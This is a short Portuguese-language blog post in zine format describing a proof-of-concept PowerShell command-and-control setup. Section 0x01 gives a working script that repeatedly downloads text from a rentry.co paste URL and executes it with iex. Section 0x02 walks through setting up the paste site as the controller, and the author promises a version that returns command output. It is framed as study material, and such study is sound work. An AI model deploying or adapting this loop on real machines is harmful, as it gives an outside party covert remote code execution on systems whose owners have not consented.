My Little Power Comand and Control

     MY LITTLE POWER COMAND AND CONTROL


        ----------------------------------------------------------------
        offensive think :: artigo técnico em formato zine / nfo
        ----------------------------------------------------------------

        titulo : My Little Power Comand and Control
        autor  : offensive think
        data   : Wed, Mar 30, 2022
        tags   : #powershell

        ----------------------------------------------------------------
        --> https://www.offensivethink.com/posts/my-little-c2.html <--

---[ INDEX ]------------------------------------------------------------
0 - A Ideia
1 - O Powershell
2 - O Site controlador
3 - Talk is Cheap, Show me the Execution!
4 - Possibilidades!




---[ 0x00 - A IDEIA ]---------------------------------------------------
Usar sites públicos sem fins maliciosos que hospedam pequenos pedaços de texto, como dontpad.com, etc. , para passar comandos para um powershell, também “não malicioso” gentilmente hospedado em um servidor/estação.


---[ 0x01 - O POWERSHELL ]----------------------------------------------
Esse código não sofreu nenhuma otimização , ofuscamento ou qualquer coisa do tipo, por se tratar apenas de uma prova de conceito para estudos.

    $urlc2="https://rentry.co/XXXXX/raw" # URL personalizada. XXXXX = Identificador único
    $c0=""
    while(1){
        $c1=(New-Object Net.WebClient).DownloadString($urlc2)
        if( $c1 -ne $c0 ) {
             iex $c1
             $c0=$c1
        }
        sleep(3) # Timer, apenas para não ficar consumindo recursos o tempo todo!
    }



---[ 0x02 - O SITE CONTROLADOR ]----------------------------------------
Utilizamos o https://rentry.co (https://rentry.co/)
Acesse o site, digite o código powershell que deseja executar no server (Ex.: Get-Process) , clique em *GO*

Na tela seguinte anote o seu código de edição, você precisará para trocar os comandos: Your Edit Code e a sua URL. Essa URL, deverá ser colocada na variável $urlc2 adicionando a string /raw no powershell script acima.



---[ 0x03 - TALK IS CHEAP, SHOW ME THE EXECUTION! ]---------------------
[embed] https://www.youtube.com/embed/tW-yMnT9Hvw?feature=oembed


---[ 0x04 - POSSIBILIDADES! ]-------------------------------------------
Muitas. ;D
É só uma prova de conceito e como tal é usada apenas para fins de estudo e verificar as possibilidades de execução de comandos em uma máquina terceira, neste caso, “cegamente”, já que o controlador não tem o retorno do comando. Mas isso dá pra implementar facilmente.  Talvez eu mostre a implementação que fiz na segunda parte ;D

---[ EOF ]--------------------------------------------------------------

                    offensive think / 2026